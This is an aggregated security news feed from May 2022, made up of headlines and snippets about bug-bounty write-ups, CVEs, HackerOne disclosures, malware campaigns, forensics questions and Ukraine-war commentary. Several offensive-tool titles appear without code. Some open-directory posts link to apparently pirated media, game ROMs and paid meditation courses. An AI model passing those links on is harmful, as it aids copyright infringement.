    Malware Campaign Targets InfoSec Community: Threat Actor Uses Fake Proof of Concept to Deliver Cobalt-Strike Beacon
    submitted by /u/soupcreamychicken [link] [comments]
  • Open

    fire: Fast tool to filter resolved domains (good for Bug Bounty purposes in a pipeline of scripts)
    submitted by /u/deleee [link] [comments]
    New Rhino Blog Post: CVE-2022-25237: Bonitasoft Authorization Bypass and RCE
    submitted by /u/hackers_and_builders [link] [comments]
    GitHub - Peco602/findwall: Check if your provider is blocking you!
    submitted by /u/Peco602 [link] [comments]
    Cisco Issues Patch for New IOS XR Zero-Day Vulnerability Exploited in the Wild
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    River: a tool for quantitative media analysis
    A web app for tracking and comparing new agencies’ reporting on the Russia-Ukraine war. Continue reading on Medium »
    War in Ukraine / May 23
    The war in the center of Europe has been going on for three months Continue reading on Medium »
    Check Which APT Group Targets your Organization
    Today we will see how to identify which APT Group is interested in your organization to attack. Continue reading on Medium »
  • Open

    GitBook Email HTML INJECTION
    Hello friends, let me introduce myself: my name is Mohammad Alfin Hidayatullah, and I am a Bug Bounty Hunter. This time I will share… Continue reading on Medium »
    Bware Labs Bets $100,000 on Blast quality by launching a Bug Bounty campaign
    We are thrilled to announce the launch of our bug bounty program on Blast, in partnership with Immunefi, Web3’s leading bug bounty… Continue reading on Bware Labs »
    How I found SSRF external interaction on Bugcrowd Public program in 5 min
    Tools - https://subdomainfinder.c99.nl/ - burp suite - burp Collaborator  - assetfinder : https://github.com/tomnomnom/assetfinder - httpx… Continue reading on Medium »
    How to effectively hunt for vulnerabilities in Wordpress Sites
    Hi Sleepyheads! Miss me? Continue reading on Medium »
    HTTP Response Splitting [CWE-113] — The Hacktivists
    HTTP Response Splitting weakness describes improper neutralization of CRLF sequences in HTTP headers. Continue reading on Medium »
    Improper Handling of Length Parameter Inconsistency [CWE-130] — The Hacktivists
    Improper Handling of Length Parameter Inconsistency is a security weakness that describes improper handling of a length field for… Continue reading on Medium »
    Off-by-one Error [CWE-193] — The Hacktivists
    Off-by-one error occurs when a program uses an improper maximum or minimum value that is one more or one less than the proper value. Continue reading on Medium »
    PHP File Inclusion [CWE-98] — The Hacktivists
    PHP File Inclusion weakness describes improper control of filename within Include() or Require() statements in a PHP program. Continue reading on Medium »
  • Open

    Event log persistence
    submitted by /u/Alareon [link] [comments]
  • Open

    SecWiki News 2022-05-24 Review
    Thoughts and practice on an XDR-based cybersecurity architecture by ourren; SecWiki Weekly (Issue 429) by ourren; A benchmark study of embedding-based knowledge graph entity alignment by ourren; Potential abuse of domain name historical reputation by Avenger; for more of the latest articles, visit SecWiki
  • Open

    Creating Reverse C2 Channel with C# Powershell and Python
    I know C2 servers are always handy, especially when they bypass most of Anti-Virus solutions. Continue reading on Medium »
  • Open

    Pwnton Pack: An Unlicensed 802.11 Particle Accelerator
    This past Christmas, I received a terrific gift from my in-laws: a replica Ghostbusters Proton Pack. I was thrilled. You see, growing up in the mid 80s, Ghostbusters was my jam. Fast forward 37 years and with the recent Ghostbusters: Afterlife film release, my nostalgia was hitting a fever pitch. Shortly after our Christmas dinner,... The post Pwnton Pack: An Unlicensed 802.11 Particle Accelerator appeared first on TrustedSec.
  • Open

    FreeBuf Morning Report | Mark Zuckerberg sued over data breach; nation-state cyber weapons will soon appear on the dark web
    INTERPOL Secretary General Jürgen Stock warned that state-developed cyber weapons will appear on the dark web within "a few years".
    Breaking down the 2021 OWASP Top 10 one by one: A02 Cryptographic Failures
    Previously known as Sensitive Data Exposure, which was more of a broad symptom than a root cause, the focus is now on failures related to cryptography (or the lack of it), which often lead to the exposure of sensitive data.
    Hiring | Du Xiaoman Financial's security department is waiting for you
    Du Xiaoman Financial is committed to using technology to provide trustworthy financial services to more people. On April 28, 2018, Baidu's financial services group completed its spin-off and financing and launched the new brand "Du Xiaoman Financial".
    Key institutions in Austria and Estonia may be targets of Russian hackers
    The Russian state-backed hacking group Turla is launching a series of attacks on the Austrian Economic Chamber, a NATO platform, and the Baltic Defence College.
    "Opinions on Promoting the Implementation of the National Cultural Digitization Strategy" released, again emphasizing data security
    The Opinions state that by the end of the 14th Five-Year Plan period, the cultural digitization infrastructure and service platforms should be largely completed, forming a cultural service supply system with integrated online and offline interaction and comprehensive coverage.
    General Motors hit by credential stuffing attack, exposing car owners' personal information
    The investigation found that in some cases the hackers redeemed customer reward points for gift cards.
    Major vulnerability disclosed in payment giant PayPal; hackers can directly steal users' funds
    The attack uses clickjacking to trick users into clicking and unknowingly completing a transaction, ultimately stealing funds.
  • Open

    How I Found a company’s internal S3 Bucket with 41k Files
    No content preview
    Cybersecurity & Application Attacks
    Buffer Overflow and XSS Cross-site Scripting attacks for SY0–601 Continue reading on InfoSec Write-ups »
  • Open

    Open redirect bypass
    Flickr disclosed a bug submitted by xlord91: https://hackerone.com/reports/1513031 - Bounty: $300
    Stored XSS in photos_user_map.gne
    Flickr disclosed a bug submitted by keer0k: https://hackerone.com/reports/1534636 - Bounty: $3263
    [python]: Zip Slip Vulnerability
    GitHub Security Lab disclosed a bug submitted by farid_hunter: https://hackerone.com/reports/1572496 - Bounty: $1000
    [Java]: Flow sources and steps for JMS and RabbitMQ
    GitHub Security Lab disclosed a bug submitted by someonenobbd: https://hackerone.com/reports/1579235
  • Open

    How can I download full folders on my android phone keeping directory structure?
    I tried using 1DM but it puts all files into the same directory. I tried using grabber, changing the recursion, batch downloads, etc but I am not getting this to work. I read through the sticky post but it didn't seem to have the answer. Any recommendations? submitted by /u/Terrible_Feature-532 [link] [comments]
    batch of movies
    submitted by /u/wiener_dawg [link] [comments]
    [Request] Anyone has the TV shows: Blossom (1990) & Brotherly Love (1995)
    submitted by /u/ShakeSpearow [link] [comments]
  • Open

    Ukraine Update 5–23–22
    The following are compiled from a variety of sources, and especially from a live Reddit thread which I follow closely. I compile these… Continue reading on Medium »
    War in Ukraine / May 20–22
    Up to 100 Heroes of Ukraine die every day in the East Continue reading on Medium »
    KILLNET, LEGION, MIRAI & co.: A short OSINT on the Italian targets and the related risk.
    The news appeared in Repubblica on May 11: “Hacker attack on Italy. What is Killnet, the Russian group that claimed it”… Continue reading on Medium »
    OSINT Course Online (Open-source Intelligence)
    In this course, you will learn about OSINT (open-source intelligence) from a hacker’s point of view. Continue reading on Medium »
    My speech in the Russian Parliament will take place in June
    My speech at the Federation Council of the Russian Federation on the creation in Russia of a specialized center of competence in the field… Continue reading on Medium »
  • Open

    A few Tailscale tricks for security testers
    submitted by /u/MysteriousHotel3017 [link] [comments]
    Hiding MSFVENOM Payloads in USB NIC EEPROM
    submitted by /u/lightgrains [link] [comments]
    Beneath the surface: Uncovering the shift in web skimming
    submitted by /u/SCI_Rusher [link] [comments]
    mx-takeover focuses DNS MX records and detects misconfigured MX records.
    submitted by /u/0xmusana [link] [comments]
    I wrote this more from an "analyze rootkit" perspective, but it's equally as valid for "driver bug hunting". Hope you enjoy.
    submitted by /u/0x4ndr3 [link] [comments]
    Exploit Development: No Code Execution? No Problem! Living The Age of VBS, HVCI, and Kernel CFG
    submitted by /u/0xdea [link] [comments]
  • Open

    Bug Bounty Diaries #3
    Hi guys! I’m back and before starting with the new blog I really wanna say THANK YOU to every follower, I’m glad to know that my blogs can… Continue reading on Medium »
    Miniseries: XSS to the core — Pt.2
    In the second part of our mini-series, we are going to look at the types of XSS and what we can do to evade those pesky filters! In the… Continue reading on Medium »
    Postponing TGE
    Dear Hats community, Continue reading on Medium »
    Top 25 SSRF Dorks | Bug Bounty
    Top 25 Server-Side Request Forgery (SSRF) Dorks Continue reading on Medium »
    Broken object level authorization.
    Continuing with vulnerabilities in APIs. Continue reading on Medium »
    Broken user authentication.
    I intend to share with you some things I learned from books and articles; I believe this can help you. Continue reading on Medium »
    CVE-2022–1813 Blind Command Injection
    This bug was found by Abdulrahman Abdullah. This is a Python-based web application in which there is no proper check on the url parameter, which… Continue reading on Medium »
    How I Get Bounty From Takeover Account
    Hi everyone how are you?, I hope you guys are well. I’m RyuuKhagetsu, this is my article in English, sorry if there are any mistakes. I… Continue reading on Medium »
  • Open

    Kind of a Wifi attack that isn't Evil Twin
    I wanted to know of a kind of Wi-Fi attack, such as Evil Twin with a captive portal, where it is possible to implement the process or the idea behind it. Thank you submitted by /u/Echowns [link] [comments]
    Best path to cybersecurity as a self-taught developer
    Hello, so I currently have around 5 free months and I wanted to heavily utilize that time towards learning to program. My long-term goal would be to get into the cyber security field but I don't have the money to go for the relevant certifications at the moment. I wanted to know which options any of you think would equip me with the most transferable skills for when I finally make the switch into cyber sec. Because I figure it would be easier to get my foot into the IT industry as a developer. For example, I'm guessing that a full stack web developer would make a good transition into web security, or a software developer would do well in Application security. Given your expertise/knowledge of the field, which path would you take if you were to start out as a developer? submitted by /u/Shogun8693 [link] [comments]
  • Open

    SecWiki News 2022-05-23 Review
    Security evaluation of GitHub Copilot by ourren; PE file structure analysis, part 2 by the SecIN community; for more of the latest articles, visit SecWiki
  • Open

    The Hunt for the Red Team
    Red teaming is an important part of any security program because it gives you a real world exercise to test your security posture. You may… Continue reading on Medium »
    How do Red Team Exercises help CISO to Validate the Security Controls Effectively?
    Red Team Exercises are one of the best ways for CISOs to validate the security controls effectively. Continue reading on Medium »
  • Open

    [Security Advisory] Fastjson 1.2.80 and earlier versions contain a Throwable de...
    Recently, the Fastjson Develop Team released a fix for a security risk in Fastjson 1.2.80 and earlier versions; the risk could lead to...
  • Open

    Vulnerability that made us 30 000$ richer
    Article URL: https://www.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/ Comments URL: https://news.ycombinator.com/item?id=31477994 Points: 2 # Comments: 1
  • Open

    Tryhackme’s OWASP Top 10
    So I have made it through a dozen or so hours of Tryhackme’s free learning path and am enjoying it, also have made through the first 6… Continue reading on Medium »
  • Open

    Recurrence and analysis of RPC high-risk Vulnerability(CVE-2022-26809)
    Author: HuanGMz@Knownsec 404 Team Chinese version: https://paper.seebug.org/1906/ 1.Vulnerability introduction It has been more than a month since the high-risk vulnerability CVE-2022-26809 was rep...
  • Open

    FreeBuf Morning Report | South Korean and US presidents join forces against North Korean cyberattacks; cyberattacks on Russia multiply
    The presidents of South Korea and the United States join forces to counter North Korea's cyberattacks.
    Elon Musk "fuels" a new cryptocurrency scam
    Recently, scammers have been observed deepfaking videos of Elon Musk and other well-known cryptocurrency advocates to promote the BitVex trading platform and steal deposited currency.
    Google: Predator spyware uses zero-day vulnerabilities to infect Android devices
    State-sponsored threat actors used five zero-day vulnerabilities to install the Predator spyware developed by the commercial surveillance vendor Cytrox.
    Cisco fixes IOS XR vulnerability exploited in the wild
    Cisco addressed a medium-severity vulnerability affecting IOS XR software that is being actively exploited in the wild.
    On the final day of Pwn2Own 2022, Windows 11 was hacked three times in a row
    Contestants mainly exploited privilege escalation vulnerabilities in Windows 11.
    Be aware: PDFs are spreading malware
    Security researchers have discovered a new malware distribution campaign in which attackers embed malicious Word documents in PDF attachments to infect users with malware.
    FreeBuf Morning Report | Conti ransomware gang announces shutdown; US Justice Department will no longer prosecute white-hat hackers
    According to a policy change announced by the US Department of Justice, good-faith security research that violates the federal anti-hacking law, the Computer Fraud and Abuse Act (CFAA), will no longer be prosecuted.
  • Open

    Secure Home Network
    Hello People, I would like to start making my private network more secure soon. Since I am forced by my provider to use a coaxial connection, this would have to be included in the IAD/router. What would you guys recommend for components for me to set up? Does it make sense to create a VLAN | Subnet on the home network? I don't have a lot of space unfortunately. Thank you in advance! submitted by /u/D3ATHB1RD [link] [comments]
    burp vs zap
    I have been solving PortSwigger labs... and due to Burp's Intruder's low speed I switched to ZAP, and now I can't solve a lab even after looking at the solutions... WTF, please put me on the right path!! submitted by /u/Full_Albatross_5636 [link] [comments]
  • Open

    Mortar Loader v2 - 0xsp SRD
    submitted by /u/dmchell [link] [comments]
  • Open

    Ukraine Update 5–22–22
    The following are compiled from a variety of sources, and especially from a live Reddit thread which I follow closely. I compile these… Continue reading on Medium »
    Good sources on the war in Ukraine
    Wanted to share a list of resources that I find useful for researching aspects on the war in Ukraine: Continue reading on Medium »
    Viewing cyber attacks in real time on a world map
    There’s a couple of various resources available to see cyber attacks in real time around the world. These are helpful from an OSINT… Continue reading on Medium »
    Cybersecurity attacks against .RU
    Since the expansion of the war in Ukraine by Russia, there has been a barrage of cyber attacks against the Russian Federation from around… Continue reading on Medium »
    SPY NEWS: 2022 — Week 20
    Summary of the espionage-related news stories for the Week 19 (15–21 May) of 2022. Continue reading on Medium »
  • Open

    Email Verification Bypass by bruteforcing when setting up 2FA
    Evernote disclosed a bug submitted by cyberworlcload: https://hackerone.com/reports/1394984 - Bounty: $150
    Possible Domain Takeover on AWS Instance.
    Rocket.Chat disclosed a bug submitted by samuelsiv: https://hackerone.com/reports/1390782
  • Open

    Bypassing LDAP Channel Binding when LDAP Signing is not Enforced
    Hello folks (nerds), I happen to come across some new research that enables to completely bypass Active Directory (AD) Lightweight… Continue reading on Medium »
    Offensive and Defensive Security: CyberSec teams with Red and Blue Jerseys.
    Red teams simulate attacks in opposition to Blue teams to check the effectiveness of their infrastructure security. These exercises offer a Continue reading on Medium »
  • Open

    How does everyone find the directories?
    I don’t understand how people can find such random things? Do y’all simply google stuff or what? submitted by /u/StupidRedditorBTW [link] [comments]
    All Headspace meditations (till 2020) + Game ROMS of old consoles (GBA, NDS, etc...) + Popular TV shows + more random stuff
    Headspace: http://kbranch.us/public/Headspace%20-%20Meditation%20and%20Mindfulness%20Made%20Simple%20(2018)//) ROMS of old games: http://kbranch.us/public/ROMs/ TV shows: http://kbranch.us/public/tv/ And some more random stuff at http://kbranch.us/public/ submitted by /u/Pelicaros [link] [comments]
    Hundreds of gigabytes of TV series, music and movies. (In Russian)
    http://195.93.160.105/ submitted by /u/i-miss-you-so-much [link] [comments]
    A collection of mostly soviet-era cartoons (cheburashka for example)
    http://www.shchupak.com/multiki/ submitted by /u/i-miss-you-so-much [link] [comments]
    Tesla Service Manuals (Google Drive)
    Tesla made their official service manuals accessible to users on their website www.service.tesla.com. Every PDF file from there, about every model, accessories, chargers and manuals, is mirrored onto GDrive. Check the README file for more details. https://drive.google.com/drive/folders/1SVsmpITqgGbyRXEWGUC35AmPmR1SXRWo?usp=sharing submitted by /u/amritajaatak [link] [comments]
    About 750 academic books and journals from a single publisher
    https://tiendaeditorial.uca.es/descargas-pdf/ Site is the academic press of the Universidad de Cádiz. Most texts are in European Spanish, with a smattering of English and French. Many of the works concern the university or Cádiz. Topics are broad but mostly history, archaeology, linguistics, literature, poetry, with lesser amounts of math, medicine, science, computers, and others. submitted by /u/clarelucebooth [link] [comments]
  • Open

    Miniseries: XSS to the core — Pt.1
    Continue reading on Medium »
    AlbusSec:- Penetration-List 06 Command Injection — Sample
    Hi Information Security folk, I hope you liked the SQL-Injection Sample Series, Where You learned about SQL-Injection In-depth, However… Continue reading on Medium »
    Vulnerability In PayPal worth 200000$ bounty, Attacker can Steal Your Balance by One-Click
    what if I told you that: A black Hat hacker can steal your money from your bank account & credit card or PayPal balance with one click… Continue reading on Medium »
    2FA Bypass on private bug bounty program due to improper caching mechanism
    Hello All, Continue reading on Medium »
    2FA Bypass on private bug bounty program due to CSRF token misconfiguration
    Hello Friends, Continue reading on Medium »
    A good resource for learning penetration testing tools and methodology
    I was searching the internet and came across a good site to bypass 403, which could help me in many other topics … Continue reading on Medium »
  • Open

    connmap - X11 desktop widget that shows location of your current network peers on a world map
    submitted by /u/jafarlihi [link] [comments]
  • Open

    SecWiki News 2022-05-22 Review
    Emergency response capability improvement 3: simulating intranet lateral movement attacks (part 1) by aerfa; Emergency response capability improvement 2: simulating cryptomining persistence attacks by aerfa; Emergency response capability improvement 1: real-world emergency response dilemmas and breakthroughs by aerfa; How to digest so many security articles (practical part) by aerfa; for more of the latest articles, visit SecWiki
  • Open

    hackmyvm series 9: translator
    This article is only for technical discussion and learning; do not use it for illegal purposes, and any illegal use has nothing to do with the author! All environments are lab machines downloaded online and studied on my own machine.
    MSF listener: bringing a backdoor online over encrypted traffic
    This test is for learning purposes only; any illegal use has nothing to do with the platform or the author, and the user bears sole responsibility!
  • Open

    Can people with limited IT experience jump relatively straight into digital forensics?
    I’m interested in DF as a field ever since learning about it. I’m curious if I need to know a lot about cyber security and IT or if I can pick it up as I go along. I'm talking about learning. A lot of the posts on Reddit say that you need to know about xyz well before you can get into “DFIR”, but what if you’re just interested in digital forensics? submitted by /u/OpalDragonDagger [link] [comments]
    iPhone
    Where can I purchase a Cellebrite or software/product to review phone data such as photos, messages, etc.? submitted by /u/PuzzleheadedRemote83 [link] [comments]
    How do you analyze memory acquisition from Windows 10 build 19044?
    Volatility 2 does not have a profile beyond build 19041 yet, and Volatility 3 lacks advanced plugins when it comes to malware analysis. How do you analyze a memory acquisition from Windows 10 build 19044? submitted by /u/jcbaptiste [link] [comments]
    Help needed with digital forensics case
    Hey guys. I’m currently studying for a cyber security degree at a university and currently have to conduct digital forensics and write a report on a woman who was suspected of malpractice (case from back in 2014). I have evidence but it can be considered circumstantial. I’ve been using Autopsy (which is great), but I feel there is something missing that is tying all my evidence together. I’ve been given all their Windows computer files. If you guys could possibly give me a few places to look at that would be great! Thanks!! submitted by /u/be-10 [link] [comments]
  • Open

    OTP Bypass on Vahak.in
    No content preview
    TryHackMe: Biblioteca
    No content preview
  • Open

    Accidentally posted nudes need help.
    Accidentally posted nudes to my Snapchat story for 9 minutes before I realized and deleted them. The problem is I was so panicked at the time that I didn't check if anyone screenshotted them. Is there any possible way I could reach out to Snapchat and find that deleted story? submitted by /u/KazaixX [link] [comments]
    Computer Forensics Help
    Hi everyone, I'm taking a digital forensics course soon. It'll start in a few weeks, but I would really like some advice or help on where to start. I'm really sorry to be so vague, but I genuinely don't know anything about this topic. I'm not sure where to start or what to do or how to study for it. I tried to google for maybe online textbooks or codelabs or something like that, but I feel like the resources are all over the place and it's just been really overwhelming to start. All the posts I've been reading here...I have no idea what they're talking about. And it's a bit sad because I would love to contribute to some of the discussions here, but I just don't know how. It's the start of summer, so I definitely have more time than usual. So I'd like a really good head start on the course that will start in a few weeks. If you had to give a complete newbie advice on where to start, I'd very very much appreciate it. Thank you! [link] [comments]
    Mac Forensics: Digital Collector vs. Recon RTI
    Greetings r/computerforensics, We've seen a huge decline in Macs hitting our lab over the last few years, but they still sprinkle in every now and then. We're evaluating our current licences and dropping our least used. For our primary Mac tool, we have to decide between Cellebrite Digital Collector and Sumuri Recon RTI. We're leaning to Recon, but would love to hear feedback on what you all are using and why. submitted by /u/BlockchainForensics [link] [comments]

    Essential links for SOC Analysts
    Hi everyone. Previously, I shared an article on Essential tools for SOC analysts. Here I wanted to share a link-based post essential… Continue reading on Medium »
    Free DLP and personnel monitoring systems
    Today we will bypass OSINT-ers and make a selection for security people. Employee control systems and DLP. Simple but free: Continue reading on Medium »

    Critical Vulnerability in Premium WordPress Themes Allows for Site Takeover
    Article URL: https://threatpost.com/vulnerability-wordpress-themes-site-takeover/179672/ Comments URL: https://news.ycombinator.com/item?id=31461535 Points: 2 # Comments: 0
    $10m bug bounty paid for Wormhole vulnerability
    Article URL: https://medium.com/immunefi/wormhole-uninitialized-proxy-bugfix-review-90250c41a43a Comments URL: https://news.ycombinator.com/item?id=31459244 Points: 2 # Comments: 0

    How “Forgot Password” can cost you your account
    Continue reading on Medium »
    CVE-2022-1784: The SSRF
    In this write-up I am going to tell you about this awesome SSRF found by Hexatron, rewarded with a $900 bounty. Continue reading on Medium »
    A business logic issue worth $1500
    Hello everyone, Continue reading on Medium »
    PayPal IDOR via billing Agreement Token (closed Informative, payment fraud)
    Continue reading on Medium »
    How I was able to down a service of Microsoft? Denial of Service (DoS) Attack on Microsoft.
    Thank you for taking the time to read about “How I was able to down a service of Microsoft? Denial of Service (DoS) Attack on Microsoft”. Continue reading on Medium »

    SecWiki News 2022-05-21 Review
    No news updated today yet. For more of the latest articles, visit SecWiki.

    Metastealer – filling the Racoon void
    submitted by /u/digicat

    Client Side Bug, EP1 — Cross-site Request Forgery (CSRF/XSRF)
    A bug that will ‘force’ the user to do something dangerous! Continue reading on Medium »

    A short look back at the exhibition — Pseudosféra by Klára Kusá
    In the little lane right beside Michalská brána (Michael's Gate) there is a smaller art gallery - Galéria X. Continue reading on Medium »

    A moderately sized GD folder with books and PDFs on hacking, cracking, networking and programming
    https://drive.google.com/drive/mobile/folders/1F7D5c30nP-y_Q7SFqoRTRvJ7tl0UcY3q submitted by /u/idkbutiwannalearn
    Where can I find 3D character packs for free like Businessman Billy?
    The Businessman Billy pack has 2-3 similar packs to it; can someone please help me get them? A female 3D character pack would be ideal. I have only got the Businessman Billy pack from a local graphic designer's website. submitted by /u/Pythagoras16

    How to make a used computer safe
    I bought a used MacBook Pro and want to make sure it's safe. I went into recovery mode (Cmd + R on boot) and reinstalled OSX. Is this sufficient to make sure any possible malware has been removed? What additional measures can/should I take to ensure the company is safe? submitted by /u/digitil


    Matryoshka Trap: Recursive MMIO Flaws Lead to VM Escape
    submitted by /u/Bison-Neat
    When eBPF meets TLS! A Security Focused Introduction to eBPF
    submitted by /u/guedou
    Hacking Chinese IoT FoR $10000
    submitted by /u/sciencestudent99
    A journey into IoT - Unknown Chinese alarm - Part 2 - Firmware dump and analysis
    submitted by /u/0xdea

    Cellebrite advice needed
    Received two (iPhone & Android) UFDR reports and Cellebrite Reader. For the iPhone I decided to export the searches as EML and bring them into our review platform. The reason I went with EML export was because it includes the message attachment within the EML message, and our platform extracts it as parent/child. It also populates the fields "TO", "FROM" and "DATES" with receiver and sender. I am having trouble doing this with the Android. It has no EML export. PDF export would work, but it creates hyperlinks with folders for the message attachments, which makes it more difficult to tie the attachments to the message when I bring it into the review platform. Any suggestions would help. XML export support is in development at the moment. submitted by /u/theedon323
    Recovering deleted Telegram messages
    What is a good tool that can help me with recovering deleted Telegram messages? I have an iPhone with full file system extraction. I have tried Magnet AXIOM and it is able to extract recent Telegram chats. It is clear from these chats that some messages were deleted by the user, which AXIOM unfortunately seems to be unable to retrieve. I tried manually searching through the SQLite DB but did not have any luck. Oxygen Forensics claimed a couple of years ago it could retrieve deleted Telegram messages, but there has not been a lot of discussion of this topic in the DFIR community since. Are deleted Telegram messages a lost cause at this point? submitted by /u/Sea_Cold_7611
    Retrieve deleted picture.jpg from image in Linux
    As the title says, I want to retrieve a JPG picture from an image I created in Linux using dd. I used the fls command to find the inode of the picture and used it together with the istat command to view the metadata of the file. What I want to do now is basically extract this picture using dd, like dd if=example.dd of=picture.jpg bs=... skip=... count=..., but there is one problem: I don't know what to enter for bs, skip and count. I've read that I need to calculate something, but I feel that I need to understand the whole process in general instead of jumping right into the calculation. Anyone that has some time to explain this to me and maybe give me some examples by extracting something from your own images (if you have one)? Would really appreciate it! Thanks! submitted by /u/ahmedmourad22

    5 Tips for new leads in Trace Labs Search Party
    I recently participated in the Trace Labs Search Party CTF; if you’re not familiar, it’s a non-theoretical OSINT CTF where participants… Continue reading on Medium »
    War in Ukraine / May 19
    👉 Lend-Lease and Western Strategy [Expert View] Continue reading on Medium »
    All Defense Tool
    First of all congratulations on finding the treasure. This project integrates excellent offensive and defensive weapons projects in the… Continue reading on Medium »

    Wormhole Uninitialized Proxy Bugfix Review
    Summary Continue reading on Immunefi »
    CVE-2021-43798 Grafana | Unauthorized arbitrary file read vulnerability
    Version 8.3.0 Continue reading on Medium »
    I Obtained ADMIN access via Account Activation link [In 30 seconds]
    Folks, for those of you who didn’t know, I absolutely have a blast every-time I have to perform web app testing; because the way to… Continue reading on Medium »
    SSRF Leads To AWS Metadata Exposure
    How can you leverage an SSRF (“Server Side Request Forgery”) vulnerability to evade filters and leak internal AWS credentials on a web… Continue reading on System Weakness »
    Incentivized testing for $ZKP Advanced Staking is now LIVE!
    Advanced $ZKP Staking Testing with 100,000 $ZKP in rewards is starting today. Welcome to Panther Zafari’s Beta! Continue reading on Panther Protocol »

    SecWiki News 2022-05-20 Review
    PE File Structure Analysis, Part 1, by the SecIN community. For more of the latest articles, visit SecWiki.

    This website will shut down soon, but they have an open directory (the C-Disk) full of old pictures and weird software from the '90s/00's
    submitted by /u/dadumir_party
    knitting patterns
    submitted by /u/PM_ME_TO_PLAY_A_GAME
    deformed dogs and their owners
    submitted by /u/PM_ME_TO_PLAY_A_GAME
    Data hoarder archive found
    http://80.56.13.139/arc2/ submitted by /u/jaydenthorup

    Alan c2 Framework v7.0: Hyper-Pivoting
    submitted by /u/aparata_s4tan

    Clickjacking at app.lemlist.com
    lemlist disclosed a bug submitted by ondermedia: https://hackerone.com/reports/1574017
    Arbitrary POST request as victim user from HTML injection in Jupyter notebooks
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1409788 - Bounty: $8690
    Error in Deleting Deck cards attachment reveals the full path of the website
    Nextcloud disclosed a bug submitted by ctulhu: https://hackerone.com/reports/1354334 - Bounty: $100
    Nextcloud Deck : Possibility for anyone to add a stack with existing tasks on anyone's board
    Nextcloud disclosed a bug submitted by supr4s: https://hackerone.com/reports/1450117 - Bounty: $250
    Sensitive files/ data exists post deletion of user account
    Nextcloud disclosed a bug submitted by geekysherlock: https://hackerone.com/reports/1222873 - Bounty: $150

    Splunk SPL Queries for Detecting gMSA Attacks
    Introduction: What is a group Managed Service Account (gMSA)? If your job is to break into networks, a gMSA can be a prime target for a path to escalate privileges, perform credential access, move laterally or even persist in a domain via a ‘golden’ opportunity. If you’re an enterprise defender, it’s something you need... The post Splunk SPL Queries for Detecting gMSA Attacks appeared first on TrustedSec.

    Widespread Swagger-UI library vulnerability leads to DOM XSS attacks
    Article URL: https://portswigger.net/daily-swig/widespread-swagger-ui-library-vulnerability-leads-to-dom-xss-attacks Comments URL: https://news.ycombinator.com/item?id=31447130 Points: 1 # Comments: 0

    Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others)
    CVE-2022-22954, one of several recently published VMware vulnerabilities, is being exploited in the wild. Read our observations and recommendations. The post Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others) appeared first on Unit42.

    雾帜智能 (Wuzhi Intelligence): AI and SOAR technology accelerate automated incident response | Cybersecurity New Forces SOLO Launch Season
    This episode features a new force in security operations, 傅奎 (Fu Kui), founder and CTO of Shanghai 雾帜智能 Technology Co., Ltd., presenting the topic "Racing Against the Clock: Accelerating Incident Response".
    2022 Voice of the CISO Global Insights Report | Threat uncertainty and a false sense of security
    A series of high-profile breaches has had far-reaching economic and security consequences, showing the world how fragile critical infrastructure and supply chains are once they become targets of cybercriminals.
    Shanghai 安般科技 (Anban Technology) job openings
    Shanghai 安般信息科技有限公司 originated from the Shanghai Institute of Microsystem of the Chinese Academy of Sciences and ShanghaiTech University, and is the first company in China, and an international leader, dedicated to commercial intelligent fuzz-testing technology.
    Endpoint security | Analysis of Intent redirection vulnerabilities
    Attackers combined the dynamic broadcast receiver registration vulnerability model in system apps with the Intent redirection vulnerability model, posing a serious threat to endpoints.
    Conti shut down at lightning speed? Perhaps it is just being reborn in another form
    One moment it was threatening to overthrow the Costa Rican government, the next it announced it was shutting down? According to Advanced Intel, its internal infrastructure has been taken offline.
    Prevention and handling measures for malicious email
    Phishing email is one of the methods hackers use most often, and cases of hackers using phishing email to carry out cyberattacks are everywhere.
    FreeBuf Weekly | Gaming giant Blizzard hit by another DDoS attack; Apple issues emergency update fixing a zero-day vulnerability
    Happy weekend, FreeBufers. Here is this week's FreeBuf Weekly.
    The strange shapes of Java framework vulnerabilities
    An explanation of framework vulnerabilities that anyone can understand.
    Authoritative recognition! 斗象科技 (Tophant) wins the CNNVD Outstanding Technical Support Unit and CNNVD Special Contribution awards
    As a CNNVD first-tier technical support unit, 斗象科技 was awarded both "CNNVD 2021 Outstanding Technical Support Unit" and "2021 Special Contribution".
    RSA Innovation Sandbox roundup | BastionZero: zero-trust infrastructure access service
    RSA Conference 2022 will open on June 6, San Francisco time. The conference's Innovation Sandbox competition, known as the "Oscars of the security world", draws attention every year and has become the global cyber…
    Major revision of the US CFAA: white-hat hackers may no longer be liable
    The CFAA now explicitly states that cybersecurity researchers and white-hat hackers have the good-faith aim of "improving technology", so the Department of Justice will no longer prosecute them under the CFAA.
    More useful than penetration testing: how should red team exercises be conducted?
    For most enterprise organizations, a true defense-in-depth strategy should include red team exercises.
    Microsoft detects surge in Linux XorDDoS malware activity
    Activity of a stealthy modular malware used to compromise Linux devices and build DDoS botnets has increased by 254%.
    Nikkei's Asian subsidiary hit by ransomware attack
    According to publishing giant Nikkei, the group's Singapore headquarters suffered a ransomware attack on May 13.
    Hackers create "robot" phone line in an attempt to waste Russian officials' time
    Hackers created a website that lets visitors randomly pick two Russian officials and connect them in a prank call, wasting their time.
    FreeBuf customer-side group discussion | Let's talk about "deleting the database"
    The case of the Lianjia database administrator who deleted the database shows that database deletion has become one of the factors enterprises must consider when facing insider security risks. How should enterprises respond?
    Is the ATT&CK framework really just for show?
    Let's talk about the "mystical" art of putting ATT&CK into practice.

    Implementing Security in SDLC
    Introduction Continue reading on InfoSec Write-ups »
    Wireless Penetration Testing (WPA-2 Cracking)
    Cyber Apocalypse CTF 2022 — Web — Intergalactic Post Write-up
    Cyber Apocalypse CTF 2022 — Web — Amidst Us Write-up
    Cyber Apocalypse CTF 2022 — Misc — Compressor Write-up (easy way)
    Cyber Apocalypse CTF 2022 — Web — Kryptos Support Write-up
    Cyber Apocalypse CTF 2022 — Intergalactic Chase Write up

    CVE-2022-26809 RPC critical vulnerability reproduction and analysis
